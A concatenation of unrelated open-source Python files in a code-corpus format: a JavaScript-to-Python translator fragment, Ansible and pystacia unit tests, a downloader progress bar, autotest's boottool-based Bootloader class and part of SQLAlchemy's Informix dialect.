    if len(args) != 1:  # a setter must take exactly 1 argument
        raise SyntaxError('Invalid setter. It must take exactly 1 argument.')
    # define a function named 'setter' in the generated code, then attach it
    res = FUNC_TRANSLATOR('setter', body, args)
    res += "%s.define_own_property(%s, {'set': setter})\n" % (lval, repr(prop))
    return res
def translate_getter(lval, getter):
    """Translate an object-literal getter ('get prop() {...}') into Python
    code that defines the getter function and registers it on *lval* via
    define_own_property."""
    func = 'function' + getter[3:]  # 'get prop(...)' -> 'function prop(...)'
    try:
        _, data, _ = functions.remove_functions(func)
        if not data or len(data) > 1:
            raise Exception()
    except Exception:
        # was a bare "except:" - narrowed so Ctrl-C/SystemExit still propagate
        raise SyntaxError('Could not parse getter: ' + getter)
    prop = data.keys()[0]
    body, args = data[prop]
    if len(args) != 0:  # a getter must take exactly 0 arguments
        raise SyntaxError('Invalid getter. It must take exactly 0 argument.')
    # define a function named 'getter' in the generated code, then attach it.
    # Bug fix: the generated define_own_property used to reference 'setter',
    # a name that does not exist in the generated scope (the translated
    # function is named 'getter', mirroring translate_setter).
    res = FUNC_TRANSLATOR('getter', body, args)
    res += "%s.define_own_property(%s, {'get': getter})\n" % (lval, repr(prop))
    return res
def translate_array(array, lval, obj_count=1, arr_count=1):
    """array has to be any js array for example [1,2,3]
    lval has to be name of this array.
    Returns python code that adds lval to the PY scope it should be put before lval"""
    array = array[1:-1]  # strip the surrounding []
    # replace nested object/array literals with placeholder lvals first
    array, obj_rep, obj_count = remove_objects(array, obj_count)
    array, arr_rep, arr_count = remove_arrays(array, arr_count)
    # functions can be also defined in arrays, this caused many problems since in Python
    # functions cant be defined inside literal
    # remove functions (they dont contain arrays or objects so can be translated easily)
    # hoisted functions are treated like inline
    array, hoisted, inline = functions.remove_functions(array, all_inline=True)
    assert not hoisted
    arr = []
    # separate elements in array
    for e in argsplit(array, ','):
        # translate expressions in array PyJsLvalInline will not be translated!
        e = exp_translator(e.replace('\n', ''))
        arr.append(e if e else 'None')  # an empty slot (elision) becomes None
    arr = '%s = Js([%s])\n' % (lval, ','.join(arr))
    # More code may have to be prepended to define the arrays/objects/functions
    # that were removed from this array above.
    # functions:
    for nested_name, nested_info in inline.iteritems():
        nested_block, nested_args = nested_info
        new_def = FUNC_TRANSLATOR(nested_name, nested_block, nested_args)
        arr = new_def + arr
    # objects:
    for lval, obj in obj_rep.iteritems():
        new_def, obj_count, arr_count = translate_object(
            obj, lval, obj_count, arr_count)
        # add object definition BEFORE array definition
        arr = new_def + arr
    # arrays:
    for lval, obj in arr_rep.iteritems():
        new_def, obj_count, arr_count = translate_array(
            obj, lval, obj_count, arr_count)
        # add array definition BEFORE this array definition
        arr = new_def + arr
    return arr, obj_count, arr_count
if __name__ == '__main__':
    # ad-hoc manual checks used during development; not a real test suite
    test = 'a = {404:{494:19}}; b = 303; if () {f={:}; { }}'
    #print remove_objects(test)
    #print list(bracket_split(' {}'))
    print()
    print(remove_arrays(
        'typeof a&&!db.test(a)&&!ib[(bb.exec(a)||["",""], [][[5][5]])[1].toLowerCase()])'
    ))
    print(is_object('', ')'))
| gpl-3.0 |
tersmitten/ansible | test/units/modules/network/fortimanager/test_fmgr_script.py | 39 | 4479 | # Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
from ansible.module_utils.network.fortimanager.fortimanager import FortiManagerHandler
import pytest
try:
from ansible.modules.network.fortimanager import fmgr_script
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
def load_fixtures():
    """Load the JSON fixture file named after this test module.

    Returns a one-element list containing the parsed fixture data, or an
    empty list when the fixture file cannot be read.
    """
    # Bug fix: the format string contained no replacement field (the
    # filename= keyword argument was dead), so the computed path was wrong.
    fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') + "/{filename}.json".format(
        filename=os.path.splitext(os.path.basename(__file__))[0])
    try:
        with open(fixture_path, "r") as fixture_file:
            fixture_data = json.load(fixture_file)
    except IOError:
        # missing fixture file -> no parametrized fixture data
        return []
    return [fixture_data]
@pytest.fixture(autouse=True)
def module_mock(mocker):
    """Automatically mock out AnsibleModule for every test in this module."""
    return mocker.patch('ansible.module_utils.basic.AnsibleModule')
@pytest.fixture(autouse=True)
def connection_mock(mocker):
    """Automatically mock out the fmgr_script Connection for every test."""
    return mocker.patch('ansible.modules.network.fortimanager.fmgr_script.Connection')
@pytest.fixture(scope="function", params=load_fixtures())
def fixture_data(request):
    """Return the recorded fixture entry for the requesting test function."""
    key = request.function.__name__.replace("test_", "")
    return request.param.get(key, None)
fmg_instance = FortiManagerHandler(connection_mock, module_mock)
def test_set_script(fixture_data, mocker):
    """set_script() should report success (status code 0) when replayed
    against the recorded FortiManager responses."""
    mocker.patch("ansible.module_utils.network.fortimanager.fortimanager.FortiManagerHandler.process_request",
                 side_effect=fixture_data)
    # Paramgram recorded in the fixture:
    #   mode: set, adom: ansible, vdom: root, script_name: TestScript,
    #   script_type: cli, script_target: remote_device,
    #   script_description: Create by Ansible,
    #   script_content: get system status,
    #   script_scope: None, script_package: None
    # Test using fixture 1 #
    output = fmgr_script.set_script(fmg_instance, fixture_data[0]['paramgram_used'])
    assert output['raw_response']['status']['code'] == 0
def test_delete_script(fixture_data, mocker):
    """delete_script() should report success (status code 0) when replayed
    against the recorded FortiManager responses."""
    mocker.patch("ansible.module_utils.network.fortimanager.fortimanager.FortiManagerHandler.process_request",
                 side_effect=fixture_data)
    # Paramgram recorded in the fixture:
    #   mode: delete, adom: ansible, vdom: root, script_name: TestScript
    #   (all other script_* fields are None)
    # Test using fixture 1 #
    output = fmgr_script.delete_script(fmg_instance, fixture_data[0]['paramgram_used'])
    assert output['raw_response']['status']['code'] == 0
def test_execute_script(fixture_data, mocker):
    """execute_script() should return a dict raw_response when replayed
    against the recorded FortiManager responses."""
    mocker.patch("ansible.module_utils.network.fortimanager.fortimanager.FortiManagerHandler.process_request",
                 side_effect=fixture_data)
    # Paramgram recorded in the fixture:
    #   mode: exec, adom: ansible, vdom: root, script_name: TestScript,
    #   script_scope: FGT1 (all other script_* fields are None)
    # Test using fixture 1 #
    output = fmgr_script.execute_script(fmg_instance, fixture_data[0]['paramgram_used'])
    assert isinstance(output['raw_response'], dict) is True
| gpl-3.0 |
squeaky-pl/pystacia | pystacia/tests/__init__.py | 1 | 2858 | # coding: utf-8
# pystacia/tests/__init__.py
# Copyright (C) 2011-2012 by Paweł Piotr Przeradowski
# This module is part of Pystacia and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import with_statement
try:
from warnings import catch_warnings, simplefilter
except ImportError:
pass
from tempfile import mkstemp
from pystacia.tests.common import TestCase, skipIf
from pystacia.image.sample import lena_available
class Lena(TestCase):
    """Sanity checks for the bundled Lena sample image."""

    @skipIf(not lena_available(), 'Lena not available')
    def test(self):
        # the default sample is the full 512x512 truecolor image
        img = image.lena()
        self.assertEqual(img.size, (512, 512))
        self.assertEqual(img.type, types.truecolor)
        img.close()

        # passing a size yields a scaled copy
        img = image.lena(32)
        self.assertEqual(img.size, (32, 32))
        img.close()
from sys import version_info
class DeprecationTest(TestCase):
    """Verify that the deprecated top-level pystacia aliases still delegate
    to pystacia.image and that each use emits a warning naming the alias."""

    @skipIf(version_info < (2, 6), 'Catching warnings not available')
    def test(self):
        import pystacia
        from pystacia import image
        with catch_warnings(record=True) as w:
            # record every warning so w[-1] is the one from the last call
            simplefilter('always')

            self.assertTrue(image.blank(30, 30).
                            is_same(pystacia.blank(30, 30)))
            self.assertTrue('blank' in w[-1].message.args[0])

            if lena_available():
                self.assertTrue(image.lena().is_same(pystacia.lena()))
                self.assertTrue('lena' in w[-1].message.args[0])

            # round-trip through a temporary BMP file for the read aliases
            tmpname = mkstemp()[1] + '.bmp'
            img = sample()
            img.write(tmpname)
            self.assertTrue(pystacia.read(tmpname).
                            is_same(image.read(tmpname)))
            self.assertTrue('read' in w[-1].message.args[0])

            self.assertTrue(pystacia.read_blob(img.get_blob('bmp')).
                            is_same(image.read_blob(img.get_blob('bmp'))))
            self.assertTrue(pystacia.read_raw(**img.get_raw('rgb')).
                            is_same(image.read_raw(**img.get_raw('rgb'))))

            img.close()

            # built-in sample image aliases
            for symbol in ['magick_logo', 'wizard',
                           'netscape', 'granite', 'rose']:
                self.assertTrue(getattr(image, symbol)().
                                is_same(getattr(pystacia, symbol)()))
                self.assertTrue(symbol in w[-1].message.args[0])

            self.assertIsInstance(pystacia.Image(), image.Image)

            # enum-like module attributes must be the same objects
            names = ['composites', 'types', 'filters', 'colorspaces',
                     'compressions', 'axes']
            for name in names:
                self.assertEqual(getattr(pystacia, name).x,
                                 getattr(image, name).x)
                self.assertTrue(name in w[-1].message.args[0])
from pystacia import image
from pystacia.image import types
from pystacia.tests.common import sample
| mit |
MGet/mget | build/lib.linux-x86_64-3.5/Mget/downloader/common.py | 6 | 3835 | #!/usr/bin/env python3
import os, sys
import time
from ..utils import (std, strip_site, MGet, urlparse, HTMLParser)
class FileDownloader(MGet):
    """Progress-bar and temp-file helpers shared by the downloader classes.

    NOTE(review): the methods below read attributes such as self.info,
    self.cursize, self.resume_len, self.quit_size, self.filesize and
    self.remaining that are never set in __init__ -- presumably a subclass
    or caller provides them; confirm before using this class stand-alone.
    """

    def __init__(self, info = {}):
        # NOTE(review): the mutable default `info` is accepted but never
        # stored here -- confirm whether subclasses rely on it.
        self.last_len = 0    # length of the previously printed progress line
        self.alt_prog = 0.0  # phase of the "unknown size" bouncing bar

    def getLocalFilesize(self, filename):
        """Return the on-disk size of `filename` or of its .part temp file,
        or None when neither exists."""
        tmp_name = self.temp_name(filename)
        if os.path.exists(filename): return os.path.getsize(os.path.join('.', filename))
        elif os.path.exists(tmp_name): return os.path.getsize(os.path.join('.', tmp_name))
        else: return None

    def flush_bar (self, result = []):
        """Join `result` into one line and print it over the previous line."""
        line = "".join(["%s" % x for x in result])
        if self.info.get('newline'): sys.stdout.write('\n')
        else: sys.stdout.write('\r')
        # erase the leftovers of a longer previous line
        if self.last_len: sys.stdout.write('\b' * self.last_len)
        sys.stdout.write("\r")
        sys.stdout.write(line)
        sys.stdout.flush()
        self.last_len = len(line)

    def _progress_bar(self, s_dif = None, progress = None, bytes = None, dif = None, width = 46):
        """Render the determinate progress bar (total size known).

        `progress` is a 0..1 fraction; `bytes`/`dif`/`s_dif` feed the
        speed and ETA calculations."""
        width = self.get_term_width() - width
        data_len = (self.cursize - self.resume_len)
        quit_size = (self.quit_size / 100.0)
        if progress > quit_size: quit_size = progress
        prog = int(progress * width)
        prog_bal = width - int(progress * width)

        if self.quit_size != 100.0:
            # partial-download mode: also mark where the download will stop
            expect = int(quit_size * width)
            ex_bal = int((width - expect) - 2)
            ex_prog_bal = int(expect - int(progress * width))
            progress_bar = "["+"="*(prog)+">"+" "*(ex_prog_bal)+"]["+" "*(ex_bal)+"] "
        else:
            progress_bar = "["+"="*(prog)+">"+" "*(prog_bal)+"] "

        _res = ["%-6s" % ("{0:.1f}%".format(float(progress) * 100.0)), progress_bar,
                "%-12s " % ("{:02,}".format(self.cursize)),
                "%9s " % (self.calc_speed(dif,bytes).decode()),
                "eta "+ self.calc_eta(s_dif, bytes, data_len, self.remaining).decode()]

        self.flush_bar (_res)

    def progress_bar_2(self, s_dif = None, progress = None, bytes = None, dif = None, width = 48):
        """Render the indeterminate bar (total size unknown): a '<=>' marker
        bouncing between the bar's ends, plus a blinking face."""
        width = self.get_term_width() - width
        prog = int(self.alt_prog * width)
        prog_bal = width - int(self.alt_prog * width)
        progress_bar = "[" + " " * (prog) + "<=>" + " " * (prog_bal) + "] "

        _res = [ "(^_^) " if int(self.alt_prog * 10) in list(range(0, 10, 4)) else "(0_0) ",
                progress_bar, "%-12s " % ("{:02,}".format(self.cursize)),
                "%9s%12s" % (self.calc_speed(dif,bytes).decode()," ")]

        self.flush_bar (_res)

        # bounce the marker: flip direction at either end of the bar
        if self.alt_prog < 0.1: self.reach_end = False
        if self.alt_prog == 1.0: self.reach_end = True
        if self.alt_prog < 1.0 and not self.reach_end: self.alt_prog += 0.1
        else: self.alt_prog -= 0.1

    def _progress(self): return self.get_progress(self.cursize, self.filesize)

    def temp_name (self, filename):
        """Return the '.part' working name for `filename`, or `filename`
        unchanged when partial files are disabled or the path exists but is
        not a regular file."""
        if self.info.get('nopart', False) or\
            (os.path.exists(filename) and not os.path.isfile(filename)):
            return filename
        return filename + ".part"

    def undo_temp_name (self, filename):
        # strip a trailing '.part' suffix, if any
        if filename.endswith (".part"): return filename[:-len(".part")]
        return filename

    def try_rename (self, old_filename, new_filename):
        """Best-effort rename; reports (rather than raises) on failure."""
        try:
            if old_filename == new_filename: return
            os.rename (old_filename, new_filename)
        except (IOError, OSError) as err:
            # NOTE(review): `common` is not imported in this module (imports
            # above pull in std/strip_site/MGet/... only), so this handler
            # would raise NameError if the rename ever fails -- confirm the
            # intended reporting helper.
            common.report ('Unable to rename file: %s' % str(err))
class MyHTMLParser(HTMLParser):
    """Scan an HTML document for tag attributes whose value points at a
    known host (std.site_list); the first match is stored under the
    hostname given to the constructor."""

    def __init__(self, html, tag = {}, hostname = None):
        HTMLParser.__init__(self)
        self.data = {}        # hostname -> matched attribute value
        self.start_tag = tag  # tag name(s) whose attributes are inspected
        self.hostname = hostname
        self.html = html

    def load(self):
        # feed the stored document through the parser (fills self.data)
        self.feed(self.html)
        self.close()

    def handle_starttag(self, tag, attrs):
        if tag not in self.start_tag: return
        for name, value in attrs:
            # NOTE(review): self.name / self.value are only assigned in
            # get_result(); calling load() directly would raise
            # AttributeError here -- confirm intended usage.
            if name in self.name or value in self.value:
                hostname, site = strip_site(value)
                if hostname in std.site_list:
                    self.data[self.hostname] = value

    def get_result(self, tag, name=None, value=None):
        """Parse the document and return the first matching attribute value
        hosted on a known site, or None when nothing matched."""
        self.start_tag = tag
        self.name = name or ''
        self.value = value or ''
        self.load()
        if self.hostname in self.data:
            return self.data[self.hostname]
        else: return
| gpl-2.0 |
yochow/autotest | server/hosts/bootloader.py | 1 | 5567 | #
# Copyright 2007 Google Inc. Released under the GPL v2
"""
This module defines the Bootloader class.
Bootloader: a program to boot Kernels on a Host.
"""
import os, sys, weakref
from autotest_lib.client.common_lib import error
from autotest_lib.server import utils
BOOTTOOL_SRC = '../client/tools/boottool' # Get it from autotest client
class Bootloader(object):
    """
    This class represents a bootloader.

    It can be used to add a kernel to the list of kernels that can be
    booted by a bootloader. It can also make sure that this kernel will
    be the one chosen at next reboot.

    All queries and modifications are delegated to the 'boottool'
    utility, which is copied to the remote host on first use.
    """

    def __init__(self, host, xen_mode=False):
        super(Bootloader, self).__init__()
        # weak reference: the bootloader must not keep the host alive
        self._host = weakref.ref(host)
        self._boottool_path = None
        self.xen_mode = xen_mode


    def get_type(self):
        """Return the bootloader type detected on the host (e.g. 'grub')."""
        return self._run_boottool('--bootloader-probe').stdout.strip()


    def get_architecture(self):
        """Return the architecture boottool detects on the host."""
        return self._run_boottool('--arch-probe').stdout.strip()


    def get_titles(self):
        """Return the list of boot entry titles."""
        return self._run_boottool('--info all | grep title | '
                                  'cut -d " " -f2-').stdout.strip().split('\n')


    def get_default_title(self):
        """Return the title of the default boot entry."""
        default = int(self.get_default())
        return self.get_titles()[default]


    def get_default(self):
        """Return the index of the default boot entry (as a string)."""
        return self._run_boottool('--default').stdout.strip()


    def _get_info(self, info_id):
        """Run 'boottool --info=<info_id>' and parse the output into a list
        of dicts, one per boot entry (entries are separated by blank lines,
        fields are 'key: value' pairs)."""
        retval = self._run_boottool('--info=%s' % info_id).stdout

        results = []
        info = {}
        for line in retval.splitlines():
            if not line.strip():
                # blank line terminates the current entry
                if info:
                    results.append(info)
                    info = {}
            else:
                key, val = line.split(":", 1)
                info[key.strip()] = val.strip()
        if info:
            results.append(info)

        return results


    def get_info(self, index):
        """Return the info dict for boot entry *index*, or {} if absent."""
        results = self._get_info(index)
        if results:
            return results[0]
        else:
            return {}


    def get_all_info(self):
        """Return the info dicts for every boot entry."""
        return self._get_info('all')


    def set_default(self, index):
        """Make boot entry *index* the default one."""
        assert(index is not None)
        if self._host().job:
            # a permanent default invalidates any pending boot-once tag
            self._host().job.last_boot_tag = None
        self._run_boottool('--set-default=%s' % index)


    def add_args(self, kernel, args):
        """Append command-line *args* to entry *kernel* (position or title)."""
        parameters = '--update-kernel=%s --args="%s"' % (kernel, args)

        # add parameter if this is a Xen entry
        if self.xen_mode:
            parameters += ' --xen'

        self._run_boottool(parameters)


    def add_xen_hypervisor_args(self, kernel, args):
        """Append hypervisor arguments to the Xen entry *kernel*."""
        self._run_boottool('--xen --update-xenhyper=%s --xha="%s"' \
            % (kernel, args))


    def remove_args(self, kernel, args):
        """Remove command-line *args* from entry *kernel* (position or title)."""
        params = '--update-kernel=%s --remove-args="%s"' % (kernel, args)

        # add parameter if this is a Xen entry
        if self.xen_mode:
            params += ' --xen'

        self._run_boottool(params)


    def remove_xen_hypervisor_args(self, kernel, args):
        """Remove hypervisor arguments from the Xen entry *kernel*."""
        # Bug fix: the '%' operands were previously applied to the *result*
        # of _run_boottool() -- i.e. _run_boottool('...%s...') % (kernel, args)
        # -- so the literal '%s' placeholders were sent to the host and the
        # call then raised TypeError. Interpolate into the command instead.
        self._run_boottool('--xen --update-xenhyper=%s '
                           '--remove-args="%s"' % (kernel, args))


    def add_kernel(self, path, title='autoserv', root=None, args=None,
                   initrd=None, xen_hypervisor=None, default=True):
        """
        Add a kernel entry to the bootloader.

        If an entry with the same title is already present, it will be
        replaced.
        """
        if title in self.get_titles():
            self._run_boottool('--remove-kernel "%s"' % (
                utils.sh_escape(title),))

        parameters = '--add-kernel "%s" --title "%s"' % (
            utils.sh_escape(path), utils.sh_escape(title),)

        if root:
            parameters += ' --root "%s"' % (utils.sh_escape(root),)

        if args:
            parameters += ' --args "%s"' % (utils.sh_escape(args),)

        # add an initrd now or forever hold your peace
        if initrd:
            parameters += ' --initrd "%s"' % (
                utils.sh_escape(initrd),)

        if default:
            parameters += ' --make-default'

        # add parameter if this is a Xen entry
        if self.xen_mode:
            parameters += ' --xen'
            if xen_hypervisor:
                parameters += ' --xenhyper "%s"' % (
                    utils.sh_escape(xen_hypervisor),)

        self._run_boottool(parameters)


    def remove_kernel(self, kernel):
        """Remove boot entry *kernel* (position or title)."""
        self._run_boottool('--remove-kernel=%s' % kernel)


    def boot_once(self, title):
        """Boot entry *title* on the next reboot only; falls back to the
        current default title when *title* is empty."""
        if self._host().job:
            self._host().job.last_boot_tag = title
        if not title:
            title = self.get_default_title()
        self._run_boottool('--boot-once --title=%s' % title)


    def install_boottool(self):
        """Copy the boottool script from the server onto the host."""
        if self._host() is None:
            raise error.AutoservError(
                "Host does not exist anymore")
        tmpdir = self._host().get_tmp_dir()
        self._host().send_file(os.path.abspath(os.path.join(
            utils.get_server_dir(), BOOTTOOL_SRC)), tmpdir)
        self._boottool_path = os.path.join(tmpdir,
                                           os.path.basename(BOOTTOOL_SRC))


    def _get_boottool_path(self):
        # lazily install boottool on the host on first access
        if not self._boottool_path:
            self.install_boottool()
        return self._boottool_path


    def _set_boottool_path(self, path):
        self._boottool_path = path


    boottool_path = property(_get_boottool_path, _set_boottool_path)


    def _run_boottool(self, cmd):
        return self._host().run(self.boottool_path + ' ' + cmd)
| gpl-2.0 |
pitch-sands/i-MPI | flask/Lib/site-packages/sqlalchemy/dialects/informix/base.py | 17 | 26186 | # informix/base.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
# coding: gbk
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Support for the Informix database.
.. note::
The Informix dialect functions on current SQLAlchemy versions
but is not regularly tested, and may have many issues and
caveats not currently handled.
"""
import datetime
from sqlalchemy import sql, schema, exc, pool, util
from sqlalchemy.sql import compiler, text
from sqlalchemy.engine import default, reflection
from sqlalchemy import types as sqltypes
RESERVED_WORDS = set(
["abs", "absolute", "access", "access_method", "acos", "active", "add",
"address", "add_months", "admin", "after", "aggregate", "alignment",
"all", "allocate", "all_rows", "alter", "and", "ansi", "any", "append",
"array", "as", "asc", "ascii", "asin", "at", "atan", "atan2", "attach",
"attributes", "audit", "authentication", "authid", "authorization",
"authorized", "auto", "autofree", "auto_reprepare", "auto_stat_mode",
"avg", "avoid_execute", "avoid_fact", "avoid_full", "avoid_hash",
"avoid_index", "avoid_index_sj", "avoid_multi_index", "avoid_nl",
"avoid_star_join", "avoid_subqf", "based", "before", "begin",
"between", "bigint", "bigserial", "binary", "bitand", "bitandnot",
"bitnot", "bitor", "bitxor", "blob", "blobdir", "boolean", "both",
"bound_impl_pdq", "buffered", "builtin", "by", "byte", "cache", "call",
"cannothash", "cardinality", "cascade", "case", "cast", "ceil", "char",
"character", "character_length", "char_length", "check", "class",
"class_origin", "client", "clob", "clobdir", "close", "cluster",
"clustersize", "cobol", "codeset", "collation", "collection",
"column", "columns", "commit", "committed", "commutator", "component",
"components", "concat", "concurrent", "connect", "connection",
"connection_name", "connect_by_iscycle", "connect_by_isleaf",
"connect_by_rootconst", "constraint", "constraints", "constructor",
"context", "continue", "copy", "cos", "costfunc", "count", "crcols",
"create", "cross", "current", "current_role", "currval", "cursor",
"cycle", "database", "datafiles", "dataskip", "date", "datetime",
"day", "dba", "dbdate", "dbinfo", "dbpassword", "dbsecadm",
"dbservername", "deallocate", "debug", "debugmode", "debug_env", "dec",
"decimal", "declare", "decode", "decrypt_binary", "decrypt_char",
"dec_t", "default", "default_role", "deferred", "deferred_prepare",
"define", "delay", "delete", "deleting", "delimited", "delimiter",
"deluxe", "desc", "describe", "descriptor", "detach", "diagnostics",
"directives", "dirty", "disable", "disabled", "disconnect", "disk",
"distinct", "distributebinary", "distributesreferences",
"distributions", "document", "domain", "donotdistribute", "dormant",
"double", "drop", "dtime_t", "each", "elif", "else", "enabled",
"encryption", "encrypt_aes", "encrypt_tdes", "end", "enum",
"environment", "error", "escape", "exception", "exclusive", "exec",
"execute", "executeanywhere", "exemption", "exists", "exit", "exp",
"explain", "explicit", "express", "expression", "extdirectives",
"extend", "extent", "external", "fact", "false", "far", "fetch",
"file", "filetoblob", "filetoclob", "fillfactor", "filtering", "first",
"first_rows", "fixchar", "fixed", "float", "floor", "flush", "for",
"force", "forced", "force_ddl_exec", "foreach", "foreign", "format",
"format_units", "fortran", "found", "fraction", "fragment",
"fragments", "free", "from", "full", "function", "general", "get",
"gethint", "global", "go", "goto", "grant", "greaterthan",
"greaterthanorequal", "group", "handlesnulls", "hash", "having", "hdr",
"hex", "high", "hint", "hold", "home", "hour", "idslbacreadarray",
"idslbacreadset", "idslbacreadtree", "idslbacrules",
"idslbacwritearray", "idslbacwriteset", "idslbacwritetree",
"idssecuritylabel", "if", "ifx_auto_reprepare", "ifx_batchedread_table",
"ifx_int8_t", "ifx_lo_create_spec_t", "ifx_lo_stat_t", "immediate",
"implicit", "implicit_pdq", "in", "inactive", "increment", "index",
"indexes", "index_all", "index_sj", "indicator", "informix", "init",
"initcap", "inline", "inner", "inout", "insert", "inserting", "instead",
"int", "int8", "integ", "integer", "internal", "internallength",
"interval", "into", "intrvl_t", "is", "iscanonical", "isolation",
"item", "iterator", "java", "join", "keep", "key", "label", "labeleq",
"labelge", "labelglb", "labelgt", "labelle", "labellt", "labellub",
"labeltostring", "language", "last", "last_day", "leading", "left",
"length", "lessthan", "lessthanorequal", "let", "level", "like",
"limit", "list", "listing", "load", "local", "locator", "lock", "locks",
"locopy", "loc_t", "log", "log10", "logn", "long", "loop", "lotofile",
"low", "lower", "lpad", "ltrim", "lvarchar", "matched", "matches",
"max", "maxerrors", "maxlen", "maxvalue", "mdy", "median", "medium",
"memory", "memory_resident", "merge", "message_length", "message_text",
"middle", "min", "minute", "minvalue", "mod", "mode", "moderate",
"modify", "module", "money", "month", "months_between", "mounting",
"multiset", "multi_index", "name", "nchar", "negator", "new", "next",
"nextval", "next_day", "no", "nocache", "nocycle", "nomaxvalue",
"nomigrate", "nominvalue", "none", "non_dim", "non_resident", "noorder",
"normal", "not", "notemplatearg", "notequal", "null", "nullif",
"numeric", "numrows", "numtodsinterval", "numtoyminterval", "nvarchar",
"nvl", "octet_length", "of", "off", "old", "on", "online", "only",
"opaque", "opclass", "open", "optcompind", "optical", "optimization",
"option", "or", "order", "ordered", "out", "outer", "output",
"override", "page", "parallelizable", "parameter", "partition",
"pascal", "passedbyvalue", "password", "pdqpriority", "percaltl_cos",
"pipe", "pli", "pload", "policy", "pow", "power", "precision",
"prepare", "previous", "primary", "prior", "private", "privileges",
"procedure", "properties", "public", "put", "raise", "range", "raw",
"read", "real", "recordend", "references", "referencing", "register",
"rejectfile", "relative", "release", "remainder", "rename",
"reoptimization", "repeatable", "replace", "replication", "reserve",
"resolution", "resource", "restart", "restrict", "resume", "retain",
"retainupdatelocks", "return", "returned_sqlstate", "returning",
"returns", "reuse", "revoke", "right", "robin", "role", "rollback",
"rollforward", "root", "round", "routine", "row", "rowid", "rowids",
"rows", "row_count", "rpad", "rtrim", "rule", "sameas", "samples",
"sampling", "save", "savepoint", "schema", "scroll", "seclabel_by_comp",
"seclabel_by_name", "seclabel_to_char", "second", "secondary",
"section", "secured", "security", "selconst", "select", "selecting",
"selfunc", "selfuncargs", "sequence", "serial", "serial8",
"serializable", "serveruuid", "server_name", "session", "set",
"setsessionauth", "share", "short", "siblings", "signed", "sin",
"sitename", "size", "skall", "skinhibit", "skip", "skshow",
"smallfloat", "smallint", "some", "specific", "sql", "sqlcode",
"sqlcontext", "sqlerror", "sqlstate", "sqlwarning", "sqrt",
"stability", "stack", "standard", "start", "star_join", "statchange",
"statement", "static", "statistics", "statlevel", "status", "stdev",
"step", "stop", "storage", "store", "strategies", "string",
"stringtolabel", "struct", "style", "subclass_origin", "substr",
"substring", "sum", "support", "sync", "synonym", "sysdate",
"sysdbclose", "sysdbopen", "system", "sys_connect_by_path", "table",
"tables", "tan", "task", "temp", "template", "test", "text", "then",
"time", "timeout", "to", "today", "to_char", "to_date",
"to_dsinterval", "to_number", "to_yminterval", "trace", "trailing",
"transaction", "transition", "tree", "trigger", "triggers", "trim",
"true", "trunc", "truncate", "trusted", "type", "typedef", "typeid",
"typename", "typeof", "uid", "uncommitted", "under", "union",
"unique", "units", "unknown", "unload", "unlock", "unsigned",
"update", "updating", "upon", "upper", "usage", "use",
"uselastcommitted", "user", "use_hash", "use_nl", "use_subqf",
"using", "value", "values", "var", "varchar", "variable", "variance",
"variant", "varying", "vercols", "view", "violations", "void",
"volatile", "wait", "warning", "weekday", "when", "whenever", "where",
"while", "with", "without", "work", "write", "writedown", "writeup",
"xadatasource", "xid", "xload", "xunload", "year"
])
class InfoDateTime(sqltypes.DateTime):
    """DateTime variant for Informix: the dialect renders DATETIME YEAR TO
    SECOND, which cannot store sub-second precision, so microseconds are
    stripped from bound values."""

    def bind_processor(self, dialect):
        def process(value):
            if value is None or not value.microsecond:
                return value
            # drop sub-second precision the column cannot hold
            return value.replace(microsecond=0)
        return process
class InfoTime(sqltypes.Time):
    """Time variant for Informix: strips microseconds on bind (the column
    has second resolution) and converts DATETIME results back to time."""

    def bind_processor(self, dialect):
        def process(value):
            if value is None or not value.microsecond:
                return value
            # drop sub-second precision the column cannot hold
            return value.replace(microsecond=0)
        return process

    def result_processor(self, dialect, coltype):
        def process(value):
            # the driver may hand back a full datetime; keep only the time
            return value.time() if isinstance(value, datetime.datetime) else value
        return process
# Override generic types with Informix-aware implementations: Informix
# DATETIME/TIME columns have second resolution, so the Info* variants
# strip microseconds before binding.
colspecs = {
    sqltypes.DateTime : InfoDateTime,
    sqltypes.TIMESTAMP: InfoDateTime,
    sqltypes.Time: InfoTime,
}
# Map Informix system-catalog type codes to SQLAlchemy types.
# NOTE(review): keys 3 and -1 each appear twice, so the earlier entries
# (FLOAT for 3, BLOB for -1) are silently overwritten by the later ones
# (Float / CLOB) -- confirm the intended catalog codes for these types.
ischema_names = {
    0 : sqltypes.CHAR,         # CHAR
    1 : sqltypes.SMALLINT,     # SMALLINT
    2 : sqltypes.INTEGER,      # INT
    3 : sqltypes.FLOAT,        # Float
    3 : sqltypes.Float,        # SmallFloat
    5 : sqltypes.DECIMAL,      # DECIMAL
    6 : sqltypes.Integer,      # Serial
    7 : sqltypes.DATE,         # DATE
    8 : sqltypes.Numeric,      # MONEY
    10 : sqltypes.DATETIME,    # DATETIME
    11 : sqltypes.LargeBinary, # BYTE
    12 : sqltypes.TEXT,        # TEXT
    13 : sqltypes.VARCHAR,     # VARCHAR
    15 : sqltypes.NCHAR,       # NCHAR
    16 : sqltypes.NVARCHAR,    # NVARCHAR
    17 : sqltypes.Integer,     # INT8
    18 : sqltypes.Integer,     # Serial8
    43 : sqltypes.String,      # LVARCHAR
    -1 : sqltypes.BLOB,        # BLOB
    -1 : sqltypes.CLOB,        # CLOB
}
class InfoTypeCompiler(compiler.GenericTypeCompiler):
    """Render SQLAlchemy types using Informix DDL spellings."""

    def visit_DATETIME(self, type_):
        # Informix DATETIME requires an explicit precision range
        return "DATETIME YEAR TO SECOND"

    def visit_TIME(self, type_):
        # time-of-day is a DATETIME restricted to the HOUR..SECOND range
        return "DATETIME HOUR TO SECOND"

    def visit_TIMESTAMP(self, type_):
